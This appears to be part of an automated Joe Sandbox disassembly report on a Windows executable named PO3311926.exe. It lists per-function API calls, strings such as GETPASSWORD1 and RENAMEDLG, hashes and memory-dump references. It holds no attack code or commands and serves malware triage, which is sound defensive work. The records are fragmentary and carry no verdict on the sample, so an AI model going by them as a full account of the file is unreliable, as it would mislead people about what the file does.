                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              • Opcode ID: 9b45d6adc559e9cda2f3b102a41ebbb4d9f51bd6ec69b3ea3e1c8332cae3154f
                                                                                              • Instruction ID: 02540dc551998f8a00d08f09d2811e859bfb7ce4938b16007b70c64b8352dc79
                                                                                              • Opcode Fuzzy Hash: 9b45d6adc559e9cda2f3b102a41ebbb4d9f51bd6ec69b3ea3e1c8332cae3154f
                                                                                              • Instruction Fuzzy Hash: BDF01D32008019BFCF266F51EC09EDA7FA6EB44B60B51C499F61A5B062CB729661D7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              • Opcode ID: e84e374a5f87d961b2eb6771df09b1ed4c10d615fc10de05dca710ed387a2b12
                                                                                              • Instruction ID: c24105b92fe9ce17374ec6e16ca173a5cb9124e81d5c6ad72f71da2f1c14803b
                                                                                              • Opcode Fuzzy Hash: e84e374a5f87d961b2eb6771df09b1ed4c10d615fc10de05dca710ed387a2b12
                                                                                              • Instruction Fuzzy Hash: A6510871248300F7E6211A9C8DE6FF673E5BB06B00FA44DD7F7A7650E1D9E2A810671A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PO3311926.exe,00000104), ref: 00BC7FAE
                                                                                              • _free.LIBCMT ref: 00BC8079
                                                                                              • _free.LIBCMT ref: 00BC8083
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\PO3311926.exe
                                                                                              • API String ID: 2506810119-2425541809
                                                                                              • Opcode ID: 2910b723b865c3b233710ce084ead2b9c53848e81f5bc1b70c41e8ee349e6553
                                                                                              • Instruction ID: c83a201c1c8d4e360ee73fed4ea1fef8b898575a1d0ece3dd88e44217d58da90
                                                                                              • Opcode Fuzzy Hash: 2910b723b865c3b233710ce084ead2b9c53848e81f5bc1b70c41e8ee349e6553
                                                                                              • Instruction Fuzzy Hash: 1D316D71A00218AFDB21DF99D885F9EBBF8EF95310F1540EEF90497211DA718E45CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BC31FB
                                                                                              • _abort.LIBCMT ref: 00BC3306
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: 5e8c7cdf4975a1e1c8b3e6775b75ac6300df7d865d7427c3c736370e5ee42aed
                                                                                              • Instruction ID: d4c29ffaead9cdfdea3cdaa5791b7e557835570dbf838c1bc3fcd9b55d62b8c3
                                                                                              • Opcode Fuzzy Hash: 5e8c7cdf4975a1e1c8b3e6775b75ac6300df7d865d7427c3c736370e5ee42aed
                                                                                              • Instruction Fuzzy Hash: 34413672900209AFCF15DF98C981FEEBBF5EF48704F188099F905AA211D735AA50DB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA7406
                                                                                                • Part of subcall function 00BA3BBA: __EH_prolog.LIBCMT ref: 00BA3BBF
                                                                                              • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00BA74CD
                                                                                                • Part of subcall function 00BA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BA7AAB
                                                                                                • Part of subcall function 00BA7A9C: GetLastError.KERNEL32 ref: 00BA7AF1
                                                                                                • Part of subcall function 00BA7A9C: CloseHandle.KERNEL32(?), ref: 00BA7B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 3813983858-639343689
                                                                                              • Opcode ID: a135a78f952155449092a4e85dd91413f0fe21342b1930bae85e1fee4266569d
                                                                                              • Instruction ID: fa0da346ad0f2fbd3e8145c34db7a7b96eea5457536adca8be651a703e6173ed
                                                                                              • Opcode Fuzzy Hash: a135a78f952155449092a4e85dd91413f0fe21342b1930bae85e1fee4266569d
                                                                                              • Instruction Fuzzy Hash: 103190B1D4C248AADF11EBA8DC45BEEBBE9EB1A304F044095F445A7292DF748A44CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
                                                                                                • Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00BBAD98
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BBADAD
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00BBADC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              • Opcode ID: 3e86b08b1be5694c025aaed02fc22ebc8d1dc415f621b4b48a65da0d2cbe4afc
                                                                                              • Instruction ID: 4774e5e058913133da1b8095d8487487e12f0a4a19e08528bde5a4a9b7b5716b
                                                                                              • Opcode Fuzzy Hash: 3e86b08b1be5694c025aaed02fc22ebc8d1dc415f621b4b48a65da0d2cbe4afc
                                                                                              • Instruction Fuzzy Hash: 7A11AF32B44200BFD6118F68DC85FBE7BEDEB4A702F4504A1F641AA4A0C6A1D905DB22
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00BAD954
                                                                                              • _strncpy.LIBCMT ref: 00BAD99A
                                                                                                • Part of subcall function 00BB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BE1030,?,00BAD928,00000000,?,00000050,00BE1030), ref: 00BB1DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: 5e36e480853b9c1c9686caf2461920b6a580f649f67e4977d95f0f276c20aef0
                                                                                              • Instruction ID: 5bf4c4e7d931bf3a27cb78ed102460a6ccc6729c5c475acc455897cb178a4a84
                                                                                              • Opcode Fuzzy Hash: 5e36e480853b9c1c9686caf2461920b6a580f649f67e4977d95f0f276c20aef0
                                                                                              • Instruction Fuzzy Hash: B921A272944248AEDB20EFA4CC45FEF7BE8EF06700F0404A2F911965A2E371D649CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00BAAC5A,00000008,?,00000000,?,00BAD22D,?,00000000), ref: 00BB0E85
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00BAAC5A,00000008,?,00000000,?,00BAD22D,?,00000000), ref: 00BB0E8F
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BAAC5A,00000008,?,00000000,?,00BAD22D,?,00000000), ref: 00BB0E9F
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00BB0EB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: 5e28930cab488712dfbc431210eddb7df621edafb5b0eb015fd937f39a0e2c55
                                                                                              • Instruction ID: be772db52ae886d0cea6995cdd47ed2b0fec2532927149eeab028daa1e4b288f
                                                                                              • Opcode Fuzzy Hash: 5e28930cab488712dfbc431210eddb7df621edafb5b0eb015fd937f39a0e2c55
                                                                                              • Instruction Fuzzy Hash: DA1191B1A047089FC3215F6ADC84AB7FBECEB55754F144C6EF1DAC3201EAB199408B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
                                                                                                • Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00BBB2BE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BBB2D6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00BBB304
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: c8f648c58eb2602c30dd1494f99d8ac519a1f8b05dc009d4b14dc731816c0f43
                                                                                              • Instruction ID: 93e406f10921a936055f4db406430dc54e73b784e9faee812e7fdc9c29281ce7
                                                                                              • Opcode Fuzzy Hash: c8f648c58eb2602c30dd1494f99d8ac519a1f8b05dc009d4b14dc731816c0f43
                                                                                              • Instruction Fuzzy Hash: E811C032940119BBDF229AA49D49FFF3BECEF1A700F0000A5FA45F7180C7E09A4597A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 34e18c83e5ef2e6fa95695b77733c0a14d59166238020e96137d12b450fd4841
                                                                                              • Instruction ID: bbe3ebcda4968490c93ad884b22308f77e6d692316db960b8536d2d127b08803
                                                                                              • Opcode Fuzzy Hash: 34e18c83e5ef2e6fa95695b77733c0a14d59166238020e96137d12b450fd4841
                                                                                              • Instruction Fuzzy Hash: 0E01B136604685AFD7118F58FC84ABA7BE8F708344B100476F849C7371EAB0C850EBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                              • Instruction ID: bb5c0b8f12a987649086b74583da53dc01b4fc4e891f63a91cc325ec0d354777
                                                                                              • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                              • Instruction Fuzzy Hash: C6A14672A047869FFB25CF28C895FAEBBE5EF51310F2841EDE4969B281C6349D41C750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00BA7F69,?,?,?), ref: 00BAA3FA
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00BA7F69,?), ref: 00BAA43E
                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00BA7F69,?,?,?,?,?,?,?), ref: 00BAA4BF
                                                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00BA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00BAA4C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: 55beee85095c1c59ea830d99f2b1b361ed91b9902337fe1a758030066e34e0aa
                                                                                              • Instruction ID: 60bbfc545caa09ca13aa312d4d2a5c94d07aac98d86f998c667d703d5eab758b
                                                                                              • Opcode Fuzzy Hash: 55beee85095c1c59ea830d99f2b1b361ed91b9902337fe1a758030066e34e0aa
                                                                                              • Instruction Fuzzy Hash: 8D418F3124C381ABD731DF24DC55FEEBBE4AB86700F040999B5D193291DBA49A48DB63
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: 164d4395b2f442ff1e38e66ccc5a5d312cb8190f8d4e80f01eb9cc7140547cc1
                                                                                              • Instruction ID: ed33a53bf65ef98706569202e6abf1a6b74b6c85c76dfa372d02189523c44c49
                                                                                              • Opcode Fuzzy Hash: 164d4395b2f442ff1e38e66ccc5a5d312cb8190f8d4e80f01eb9cc7140547cc1
                                                                                              • Instruction Fuzzy Hash: F641B47190166A5BCB619F688C45BEF7BFCEF01710F004459F946F7241DA70AE458BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00BC47C6,00000000,00000000,00BC57FB,?,00BC57FB,?,00000001,00BC47C6,2DE85006,00000001,00BC57FB,00BC57FB), ref: 00BCC9D5
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BCCA5E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BCCA70
                                                                                              • __freea.LIBCMT ref: 00BCCA79
                                                                                                • Part of subcall function 00BC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: 3799894ae917b15333ab0078b5ae459000102dfd5c3b76fa2e7b7563c097c249
                                                                                              • Instruction ID: eff7a5b07b8c088208f6d345f5afd61556e779953817862b6543ed05b4c691c0
                                                                                              • Opcode Fuzzy Hash: 3799894ae917b15333ab0078b5ae459000102dfd5c3b76fa2e7b7563c097c249
                                                                                              • Instruction Fuzzy Hash: 6E31AD72A0020AABDB25DF64CC95EBE7BE5EB11710B1442ADFC08E7255EB35CD50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00BBA666
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BBA675
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BBA683
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00BBA691
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: 9fa7425f18894e7b91610f06af8941848ed2fcef86c8c81bcc15354dbb9098ab
                                                                                              • Instruction ID: 89ea97328e4c43c1df56557bb82aef46e6bed3b9de7a631e5ce7766e9b75ee1e
                                                                                              • Opcode Fuzzy Hash: 9fa7425f18894e7b91610f06af8941848ed2fcef86c8c81bcc15354dbb9098ab
                                                                                              • Instruction Fuzzy Hash: CCE0EC71943BA1ABD3615B60AD4DB8F3E68EB05B57F024101FA099A2D0DB648600CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
